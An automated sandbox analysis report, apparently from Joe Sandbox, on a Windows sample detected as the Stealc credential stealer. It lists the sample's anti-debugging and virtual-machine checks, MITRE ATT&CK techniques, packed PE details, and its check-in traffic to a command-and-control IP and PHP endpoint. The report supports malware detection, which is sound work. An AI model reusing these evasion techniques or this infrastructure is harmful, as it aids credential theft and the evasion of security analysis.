                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A43B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00A43B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A44B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A44B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00A3EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00A3BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A3DF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A31160 GetSystemInfo,ExitProcess,0_2_00A31160
                Source: file.exe, file.exe, 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1283384849.00000000012FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1283384849.0000000001375000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1283384849.0000000001344000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                Source: file.exe, 00000000.00000002.1283384849.0000000001375000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW~
                Source: file.exe, 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37169
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37166
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37188
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37180
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37220
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37053
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A34610 VirtualProtect ?,00000004,00000100,000000000_2_00A34610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A49BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00A49BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A49AA0 mov eax, dword ptr fs:[00000030h]0_2_00A49AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A47690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00A47690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5960, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A49790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00A49790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A498E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_00A498E0
                Source: file.exe, file.exe, 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A775A8 cpuid 0_2_00A775A8
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00A47D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A46BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00A46BC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A479E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00A479E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A47BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00A47BC0

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.a30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1239089821.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1283384849.00000000012FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5960, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.a30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1239089821.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1283384849.00000000012FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5960, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem334
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrue
                  		unknown
                  http://185.215.113.206/true
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/6c4adf523b719729.phpQDfile.exe, 00000000.00000002.1283384849.0000000001344000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206file.exe, 00000000.00000002.1283384849.00000000012FE000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.206/6c4adf523b719729.phpIDfile.exe, 00000000.00000002.1283384849.0000000001344000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.206/6c4adf523b719729.phpJfile.exe, 00000000.00000002.1283384849.0000000001359000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.215.113.206/6c4adf523b719729.phpftfile.exe, 00000000.00000002.1283384849.00000000012FE000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.206/6c4adf523b719729.php//file.exe, 00000000.00000002.1283384849.0000000001359000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.215.113.206/6c4adf523b719729.phpLMEMfile.exe, 00000000.00000002.1283384849.0000000001359000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://185.215.113.206/sonationfile.exe, 00000000.00000002.1283384849.0000000001359000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000003.1239089821.0000000004E3B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    185.215.113.206
                                    		unknownPortugal
                                    		206894WHOLESALECONNECTIONSNLtrue

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1546617
                                    Start date and time:2024-11-01 08:51:10 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 5m 1s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:15
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:file.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 80%
                                    • Number of executed functions: 19
                                    • Number of non-executed functions: 127
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • VT rate limit hit for: file.exe

                                    Simulations

                                    Behavior and APIs

                                    No simulations

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    185.215.113.206file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                    • 185.215.113.206/6c4adf523b719729.php

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                    • 185.215.113.16
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                    • 185.215.113.17
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                    • 185.215.113.16
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    No created / dropped files found

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.9617836672005975
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:file.exe
                                    File size:2'159'616 bytes
                                    MD5:caff2fe6c91944cca73634bb9b591335
                                    SHA1:f449657c2b9733b3cd2b90b7320097902f9a94c9
                                    SHA256:68765aa962ddcffd239f27e69605d71138b54d35ed5fd9f36b7e33b0b672ab34
                                    SHA512:6da311a011bf45dd313df5b5e8940e970b8ffbaac001cac82f116f069e662fcef03d12d224c275cb5b922da90f897875327b925d7ad06fe107bea0814144c6a9
                                    SSDEEP:49152:9/gwchnrhvZQiqhLl9yiS8xt+6ijQsAeu00/CQcx1E:6wYnrhhQhhLlPS83fij3AeICQcx
                                    TLSH:75A533470EA635B5CD91CFB5EAF9EA2A5CB5FF023B23C50C064811B253BBB565A4D80C
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

                                    File Icon

                                    Icon Hash:00928e8e8686b000

                                    Static PE Info

                                    General

                                    Entrypoint:0xb3c000
                                    Entrypoint Section:.taggant
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                                    Entrypoint Preview

                                    Instruction
                                    jmp 00007FAB30C5B37Ah
                                    psrld mm4, qword ptr [eax]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add cl, ch
                                    add byte ptr [eax], ah
                                    add byte ptr [eax], al
                                    inc ecx
                                    push bx
                                    dec esi
                                    dec ebp
                                    das
                                    xor al, 36h
                                    dec edi
                                    bound ecx, dword ptr [ecx+4Ah]
                                    dec edx
                                    insd
                                    push edi
                                    dec eax
                                    dec eax
                                    jbe 00007FAB30C5B3E2h
                                    push esi
                                    dec edx
                                    popad
                                    je 00007FAB30C5B3DBh
                                    push edx
                                    dec esi
                                    jc 00007FAB30C5B3EAh
                                    cmp byte ptr [ebx], dh
                                    push edx
                                    jns 00007FAB30C5B3B7h
                                    or eax, 49674B0Ah
                                    cmp byte ptr [edi+43h], dl
                                    jnc 00007FAB30C5B3BDh
                                    bound eax, dword ptr [ecx+30h]
                                    pop edx
                                    inc edi
                                    push esp
                                    push 43473163h
                                    aaa
                                    push edi
                                    dec esi
                                    xor ebp, dword ptr [ebx+59h]
                                    push edi
                                    push edx
                                    pop eax
                                    je 00007FAB30C5B3C7h
                                    xor dl, byte ptr [ebx+2Bh]
                                    popad
                                    jne 00007FAB30C5B3BCh
                                    dec eax
                                    dec ebp
                                    jo 00007FAB30C5B3B3h
                                    xor dword ptr [edi], esi
                                    inc esp
                                    dec edx
                                    dec ebp
                                    jns 00007FAB30C5B3C0h
                                    insd
                                    jnc 00007FAB30C5B3E0h
                                    aaa
                                    inc esp
                                    inc ecx
                                    inc ebx
                                    xor dl, byte ptr [ecx+4Bh]
                                    inc edx
                                    inc esp
                                    bound esi, dword ptr [ebx]
                                    or eax, 63656B0Ah
                                    jno 00007FAB30C5B3C8h
                                    push edx
                                    insb
                                    js 00007FAB30C5B3E1h
                                    outsb
                                    inc ecx
                                    jno 00007FAB30C5B3C2h
                                    push ebp
                                    inc esi
                                    pop edx
                                    xor eax, dword ptr [ebx+36h]
                                    push eax
                                    aaa
                                    imul edx, dword ptr [ebx+58h], 4Eh
                                    aaa
                                    inc ebx
                                    jbe 00007FAB30C5B3BCh
                                    dec ebx
                                    js 00007FAB30C5B3B3h
                                    jne 00007FAB30C5B3A1h
                                    push esp
                                    inc bp
                                    outsb
                                    inc edx
                                    popad
                                    dec ebx
                                    insd
                                    dec ebp
                                    inc edi
                                    xor dword ptr [ecx+36h], esp
                                    push 0000004Bh
                                    sub eax, dword ptr [ebp+33h]
                                    jp 00007FAB30C5B3CCh
                                    dec edx
                                    xor bh, byte ptr [edx+56h]
                                    bound eax, dword ptr [edi+66h]
                                    jbe 00007FAB30C5B3AAh
                                    dec eax
                                    or eax, 506C720Ah
                                    aaa
                                    xor dword ptr fs:[ebp+62h], ecx
                                    arpl word ptr [esi], si
                                    inc esp
                                    jo 00007FAB30C5B3E3h

                                    Rich Headers

                                    Programming Language:
                                    • [C++] VS2010 build 30319
                                    • [ASM] VS2010 build 30319
                                    • [ C ] VS2010 build 30319
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [LNK] VS2010 build 30319

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    0x10000x2e70000x6760047afbc8e648f90069f469be4e6c9a1f9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    0x2ea0000x2ac0000x2006b143a1a740551e61d6d389a249a7ed1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    rcutauay0x5960000x1a50000x1a4400fecf452bf99f63dd5aa347b8aac3a54aFalse0.994974856856038data7.954004161213286IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    rnjpicgc0x73b0000x10000x400d3dc970d700db56dacd85352b907533fFalse0.7939453125data6.233324494902719IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .taggant0x73c0000x30000x2200ad5b42b16b7d125bfa19cb102c063725False0.3591452205882353DOS executable (COM)3.928078428366535IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                    Imports

                                    DLLImport
                                    kernel32.dlllstrcpy

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-11-01T08:52:05.984629+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.749699185.215.113.20680TCP
                                    2024-11-01T08:52:19.231782+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.749720TCP
                                    2024-11-01T08:52:57.975035+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.749944TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Nov 1, 2024 08:52:04.791784048 CET4969980192.168.2.7185.215.113.206
                                    Nov 1, 2024 08:52:04.796818018 CET8049699185.215.113.206192.168.2.7
                                    Nov 1, 2024 08:52:04.796933889 CET4969980192.168.2.7185.215.113.206
                                    Nov 1, 2024 08:52:04.797893047 CET4969980192.168.2.7185.215.113.206
                                    Nov 1, 2024 08:52:04.802700996 CET8049699185.215.113.206192.168.2.7
                                    Nov 1, 2024 08:52:05.695096016 CET8049699185.215.113.206192.168.2.7
                                    Nov 1, 2024 08:52:05.695342064 CET4969980192.168.2.7185.215.113.206
                                    Nov 1, 2024 08:52:05.698236942 CET4969980192.168.2.7185.215.113.206
                                    Nov 1, 2024 08:52:05.703325987 CET8049699185.215.113.206192.168.2.7
                                    Nov 1, 2024 08:52:05.984549999 CET8049699185.215.113.206192.168.2.7
                                    Nov 1, 2024 08:52:05.984628916 CET4969980192.168.2.7185.215.113.206
                                    Nov 1, 2024 08:52:09.418809891 CET4969980192.168.2.7185.215.113.206

                                    HTTP Request Dependency Graph

                                    • 185.215.113.206

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.749699185.215.113.206805960C:\Users\user\Desktop\file.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 1, 2024 08:52:04.797893047 CET90OUTGET / HTTP/1.1
                                    Host: 185.215.113.206
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Nov 1, 2024 08:52:05.695096016 CET203INHTTP/1.1 200 OK
